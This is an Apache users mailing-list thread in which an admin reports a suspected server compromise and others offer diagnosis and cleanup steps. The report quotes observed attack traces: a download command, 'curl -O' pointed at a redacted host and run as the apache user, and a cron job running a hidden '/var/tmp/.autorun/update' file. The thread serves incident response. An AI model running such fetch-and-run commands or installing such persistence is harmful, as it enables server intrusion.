On 01/11/2012 08:24 PM, Luisa Ester Navarro wrote:
------------------------------------------------------------------------
From: luisa2...@hotmail.com
To: users@httpd.apache.org
Subject: RE: [users@httpd] attack on apache
Date: Wed, 11 Jan 2012 16:15:14 -0300
> Date: Mon, 9 Jan 2012 17:30:21 +0000
> From: tevans...@googlemail.com
> To: users@httpd.apache.org
> Subject: Re: FW: [users@httpd] attack on apache
>
> On Mon, Jan 9, 2012 at 5:20 PM, Luisa Ester Navarro
> <luisa2...@hotmail.com> wrote:
> >
> >
> > ________________________________
> >
> > I didnĀ“t have any cronjobs but when I detected the attack I saw
one in
> > /var/spool/cron
> > My logifle says
> > User apache:
> >
> > /var/tmp/.autorun/update >/dev/null 2>&1: 2162 Time(s)
> >
> > personal crontab deleted: 56 Time(s)
> >
> > personal crontab listed: 1 Time(s)
> >
> > personal crontab replaced: 1 Time(s)
> >
> > Thanks
> >
>
> Google tells me that this is output from a cpanel perl script -
> probably a crontab editor. crontabs are not evidence of an attack.
>
> You need to show more details of what you think is happening, and why
> you think it is malicious.
> Cheers
Tom
I think it is an attack because I found this commands running on my
server (with owner apache)
/usr/local/apache/bin/httpd - DSFSL
sh -c curl -O http://xxxx
I also found a folder proc in /var/named/chroot. this folder is the
same as /proc, is updated with the original /proc and I can't delete.
That is a bind mount, and probably unrelated. It may be necessary to run
BIND chrooted.
In /var/log/httpd/error_log I see hink like this
sh: del comand no found
sh: xx Permission denied
I need help !
1. Stop apache.
2. investigate which leaky, creaky or lousy PHP script allowed this exploit.
3. remove the bad script.
--
J.
